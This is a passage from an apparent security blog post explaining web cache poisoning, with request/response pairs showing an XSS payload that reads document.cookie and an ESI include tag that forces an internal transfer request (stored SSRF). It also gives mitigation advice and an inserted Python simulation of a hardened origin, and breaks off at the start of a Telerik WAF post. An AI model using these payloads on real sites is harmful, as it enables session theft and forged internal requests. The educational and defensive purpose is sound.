<b id="docs-internal-guid-dcc0c1d3-7fff-0497-53e6-909c1438aaf8" style="font-weight: normal;"><br /></b></p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GET /home/private/projections</span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">?insurance=not_existing</span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> HTTP/1.1</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Host: vulnerable-host.com</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: 
User-Agent">
#333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Accept-Encoding: gzip, deflate</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Origin-URL: </span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">“&gt;&lt;img src=x onerror=alert(document.cookie)&gt;&lt;!--</span></p></td></tr></tbody></table></div><p><br /></p><p> Response: <b id="docs-internal-guid-aad3475b-7fff-2868-388a-e58b1bf38670" style="font-weight: normal;"><br /></b></p><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 
451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">HTTP/1.1 200 OK</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Content-Type: text/html</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Connection: close</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">X-Cache: </span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; 
MISS</span>">
white-space: pre;">MISS</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Content-Length: 3114</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">[ . . . ]</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">&lt;img src=”</span><span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">”&gt;&lt;img src=x onerror=alert(document.cookie)&gt;&lt;!--</span><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">/img/bank_logo.png”&gt;&lt;br&gt;</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="background-color: transparent; color: #333333; font-family: 'Courier New'; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">[ . . . 
]</span></p></td></tr></tbody></table></div><p><br /></p><p>Once the victim user visits the resource with the arbitrary URL parameter value controlled by the malicious user: </p><ul>
<li><i>“vulnerable-host.com/home/private/projections?insurance=not_existing”</i></li>
</ul>
The <b>cached response</b> with the <b>XSS payload</b> is returned to the victim user, successfully completing the Cache Poisoning attack.
<br /><br />
Request: <span id="docs-internal-guid-c0430df9-7fff-e82d-b3b8-2dfcdf25b4c1"><br /><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">GET </span><span style="color: red; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/home/private/projections?insurance=not_existing</span><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> HTTP/1.1</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Host: vulnerable-host.com</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:81.0) Gecko/20100101 
Firefox/81.0</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Accept-Encoding: gzip, deflate</span></p></td></tr></tbody></table></div></span><div> <br />Response: <span id="docs-internal-guid-92c95701-7fff-08a9-a67e-9a6b6335159a"><br /><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">HTTP/1.1 200 OK</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Content-Type: text/html</span></p><p dir="ltr" style="line-height: 1.2; 
margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Connection: close</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">X-Cache: </span><span style="color: red; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">HIT</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Content-Length: 3114</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[ . . . 
]</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">&lt;img src="</span><span style="color: red; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">"&gt;&lt;img src=x onerror=alert(document.cookie)&gt;&lt;!--</span><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/img/bank_logo.png"&gt;&lt;br&gt;</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[ . . . ]</span></p></td></tr></tbody></table></div></span><br />
A different scenario concerns the “<b><i><a href="https://docs.oracle.com/cd/B14099_19/caching.1012/b14046/esi.htm" target="_blank">Edge Side Includes</a></i></b>” (<i>ESI</i>) <i><b><a href="https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/" target="_blank">tag injection attack</a></b></i>, which becomes possible when reverse proxies, load balancers, caching servers or proxy servers (for instance, <i>“Squid Proxy”, “Varnish”, “Oracle WebLogic”, “F5” and “Fastly”</i>) are involved in the communication.
<br /><br />
This attack, combined with the cache poisoning one, could lead to <b>stored SSRF</b> and <b>XSS attacks</b>. Since the ESI parser is not able to distinguish between legitimate ESI tags provided by the upstream server and malicious ones injected into the HTTP response, an attacker could abuse a Cache Poisoning flaw in order to <b>store a malicious &lt;esi&gt; tag inside</b> a dynamically generated response page.
<br /><br />
Let’s consider, for instance, the <i>SSRF</i> scenario:<br />
The following request injects an <i>&lt;esi&gt;</i> tag inside the response through a URL parameter unsafely reflected in the response page, while “client_id” is used as cache-key. </div><div>Request: </div><span id="docs-internal-guid-58b52abf-7fff-234f-77cb-a19c8d923d61"><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">GET </span><span style="font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">/home/contact?</span><span style="color: red; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">client_id=143</span><span style="font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">&amp;</span><span style="color: red; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">country_id=&lt;esi:include%20src="http://10.0.0.7/transfer?recipient=12345&amp;amount=54321"/&gt;</span><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> HTTP/1.1</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Host: vulnerable-host.com</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Accept-Encoding: gzip, deflate</span></p></td></tr></tbody></table></div></span><div><br />
Response: <span id="docs-internal-guid-be8fac36-7fff-4abe-168e-a001c2cf3e35"><br /><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none; table-layout: fixed; width: 451.276pt;"><colgroup><col></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">HTTP/1.1 200 OK</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Content-Type: text/html</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Connection: close</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">X-Cache: </span><span style="color: red; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">MISS</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Content-Length: 3114</span></p><br /><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[ . . . ]</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: red; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">&lt;esi:include src="http://10.0.0.7/transfer?recipient=12345&amp;amount=54321"/&gt;</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="color: #333333; font-family: "Courier New"; font-size: 8pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">[ . . . ]</span></p></td></tr></tbody></table></div></span><br />
If a malicious user tricks a victim into visiting the URL with the attacker’s cache-key:
<ul>
<li><i>“vulnerable-host.com/home/contact?client_id=143”</i></li>
</ul>
the application sends the cached response page with the injected <i>&lt;esi&gt;</i> tag to the surrogate. The surrogate detects the tag, and the “<i>Stored Server-Side Request Forgery</i>” attack is successfully exploited!
<br />
The diagram below shows how the parts interact with each other:</div><div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKq_4iN5O_TZW0DeVTjbm7RSATWqxyswNBjiXHFu2jVZdKeVk9u0CKbaSVWBdtsQB6dgFPsa8h_z_98itLZZ20vfmCStKCHq-vaRYoA9i8JqXya2fQDJH20KkJOfIpE9yTvkxQwEuhyphenhyphenpU/s2048/ssrf_blog.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1229" data-original-width="2048" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKq_4iN5O_TZW0DeVTjbm7RSATWqxyswNBjiXHFu2jVZdKeVk9u0CKbaSVWBdtsQB6dgFPsa8h_z_98itLZZ20vfmCStKCHq-vaRYoA9i8JqXya2fQDJH20KkJOfIpE9yTvkxQwEuhyphenhyphenpU/w640-h384/ssrf_blog.jpg" width="640" /></a></div><p></p>
<br />
<h3>Conclusions</h3>
<p>It is recommended to pay close attention when <b>new caching rules </b>are added, since extending pre-existing configurations is a <b>common source</b> of cache flaws.
<br /><br />
For this reason, the use of <i>pre-made scripts</i> that apply a uniform cache-control setting across all endpoints at once is strongly discouraged.
<br /><br />
Regarding <b>Web Cache Deception</b> mitigation, all the gateway layers should have a consistent configuration, in order to prevent a misconfiguration among them, and should cache web pages based on their content type.
<br /><br />
On the other hand, in order to decrease the likelihood of being vulnerable to <i style="font-weight: bold;">Web Cache Poisoning </i>attacks, it is recommended to <b>validate</b> and <b>escape</b> all user-controlled inputs, including the request headers.
<br /><br />
In particular, it is important to check all the inputs which are <b>reflected</b> in cacheable responses. Indeed, it is strongly recommended to <b>avoid caching web responses</b> which include user-provided inputs.
<br /><br />
Last but not least, as a best practice, it is important to <b>stay up to date</b> with the latest <b>security bulletins</b> related to the <i>web components</i> in use, in order to become aware of new <b>security patches</b> or guides for a correct and secure infrastructure configuration.
</p><br />
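<p>To make the cache-key mismatch above concrete (a surrogate keyed on <i>client_id</i> while the origin reflects the unkeyed <i>country_id</i>), and to show the two mitigations recommended here (escaping reflected input and not caching responses that embed it), the following Python model is an added example and not code from the original post. The toy surrogate, the two origin handlers, the host name and the ESI payload are all constructed for the example.</p>

```python
import re
from html import escape
from urllib.parse import parse_qs, quote, urlsplit

# Anything that looks like an ESI directive. A surrogate with ESI enabled would
# act on such a tag if it reached it unescaped in a response body.
ESI_TAG = re.compile(r"<\s*esi:[a-z]+", re.IGNORECASE)

# Constructed sample values (not taken from the original post).
HOST = "http://vulnerable-host.example"
ESI_PAYLOAD = '<esi:include src="http://10.0.0.7/transfer?recipient=12345&amount=54321"/>'
VICTIM_URL = f"{HOST}/home/contact?client_id=143"


def attacker_url() -> str:
    """Same client_id as the victim, plus the unkeyed country_id carrying the tag."""
    return f"{HOST}/home/contact?client_id=143&country_id={quote(ESI_PAYLOAD, safe='')}"


def origin_vulnerable(url: str) -> dict:
    """Reflects country_id verbatim and sends no Cache-Control, so the surrogate stores it."""
    country = parse_qs(urlsplit(url).query).get("country_id", [""])[0]
    return {"status": 200, "headers": {},
            "body": f'<p>Contact page for country "{country}"</p>'}


def origin_hardened(url: str) -> dict:
    """Escape the reflected value and refuse caching for responses that embed user input."""
    params = parse_qs(urlsplit(url).query)
    country = params.get("country_id", [""])[0]
    headers = {"Cache-Control": "no-store"} if "country_id" in params else {}
    return {"status": 200, "headers": headers,
            "body": f'<p>Contact page for country "{escape(country, quote=True)}"</p>'}


class Surrogate:
    """Toy caching proxy keyed on path + client_id only (the misconfiguration)."""

    def __init__(self, origin):
        self.origin = origin
        self.store = {}

    def cache_key(self, url: str) -> tuple:
        parts = urlsplit(url)
        client = parse_qs(parts.query).get("client_id", [""])[0]
        return (parts.path, client)  # country_id is deliberately not part of the key

    def fetch(self, url: str) -> dict:
        key = self.cache_key(url)
        if key in self.store:
            return {**self.store[key], "x_cache": "HIT"}
        resp = self.origin(url)
        if resp["headers"].get("Cache-Control") != "no-store":
            self.store[key] = resp
        return {**resp, "x_cache": "MISS"}


def carries_esi_directive(resp: dict) -> bool:
    """True when an unescaped ESI tag is present in the body the surrogate would parse."""
    return ESI_TAG.search(resp["body"]) is not None


def run_scenario(origin) -> dict:
    """One poisoning request, then a victim request that shares the cache key."""
    cdn = Surrogate(origin)
    attacker = cdn.fetch(attacker_url())
    victim = cdn.fetch(VICTIM_URL)
    return {"attacker_x_cache": attacker["x_cache"],
            "victim_x_cache": victim["x_cache"],
            "victim_gets_esi_tag": carries_esi_directive(victim)}


if __name__ == "__main__":
    for name, origin in (("vulnerable", origin_vulnerable), ("hardened", origin_hardened)):
        print(name, run_scenario(origin))
```

With the vulnerable origin the victim's request is a HIT that still carries the ESI tag; with the hardened origin the poisoning response is never stored and the reflected value is escaped, so no directive reaches the surrogate.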
<h2>References</h2>
<p></p><ul>
<li>Cloudflare CDN cache behaviour: <a href="https://support.cloudflare.com/hc/en-us/articles/200172516">https://support.cloudflare.com/hc/en-us/articles/200172516</a></li>
<li>Reverse proxy related attacks: <a href="https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/">https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/</a></li>
<li>Paper “Cached And Confused”: <a href="https://arxiv.org/pdf/1912.10190.pdf">https://arxiv.org/pdf/1912.10190.pdf</a></li>
<li>Cloudflare - How to avoid cache poisoning: <a href="https://support.cloudflare.com/hc/en-us/articles/360014881471-Avoiding-Web-Cache-Poisoning-Attacks">https://support.cloudflare.com/hc/en-us/articles/360014881471-Avoiding-Web-Cache-Poisoning-Attacks</a></li>
<li>Header caching by Amazon: <a href="https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html">https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html</a></li>
<li>Cache poisoning attack: <a href="https://samcurry.net/abusing-http-path-normalization-and-cache-poisoning-to-steal-rocket-league-accounts/">https://samcurry.net/abusing-http-path-normalization-and-cache-poisoning-to-steal-rocket-league-accounts/</a></li>
<li>General HTTP header list: <a href="https://hackertarget.com/http-header-check/">https://hackertarget.com/http-header-check/</a></li>
<li>Introduction to cache: <a href="http://home.eng.iastate.edu/~zzhang/courses/cpre581-f05/reading/smith-csur82-cache.pdf">http://home.eng.iastate.edu/~zzhang/courses/cpre581-f05/reading/smith-csur82-cache.pdf</a>, <a href="https://appcheck-ng.com/web-cache-poisoning-explained/">https://appcheck-ng.com/web-cache-poisoning-explained/</a></li>
<li>Using cache memory to reduce processor-memory traffic: <a href="https://dl.acm.org/doi/abs/10.1145/800046.801647">https://dl.acm.org/doi/abs/10.1145/800046.801647</a></li>
<li>Beyond XSS: Edge Side Include Injection: <a href="https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/">https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/</a></li>
</ul><p></p></div><p>Author: Giorgio Rando</p><h2>WAF Journey - Fixing Telerik UI Remote Code Execution via Arbitrary File Upload</h2><p>Published 2020-11-16</p><h3 cid="n3" class="md-end-block md-heading md-focus" mdtype="heading" style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; color: #333333; cursor: text; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 1.5em; line-height: 1.43; margin-bottom: 1rem; margin-top: 1rem; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain md-expand" md-inline="plain" style="box-sizing: border-box;">Introduction</span></h3><div><p cid="n4" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">It might occur that companies discover vulnerabilities in web application assets that were acquired from <i>third party vendors</i>. </span></p><p cid="n4" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">What happens if the asset is no longer supported or licensed and cannot be promptly <i>updated</i> by the organization?</span></p><p cid="n4" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">A viable option is to use a <i>Web Application Firewall</i> (WAF) with a <i><b>custom developed rule</b></i> that blocks attempts to exploit specific vulnerabilities. </span></p><p cid="n4" class="md-end-block md-p md-focus" mdtype="paragraph" style="box-sizing: border-box; color: #333333; font-family: "Open Sans", "Clear Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 16px; line-height: inherit; margin: 0.8em 0px; orphans: 4; position: relative; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;">Even though this approach might <i>not</i> be the definitive solution, it allows a company to buy time to figure out how to correctly patch or, perhaps, replace the 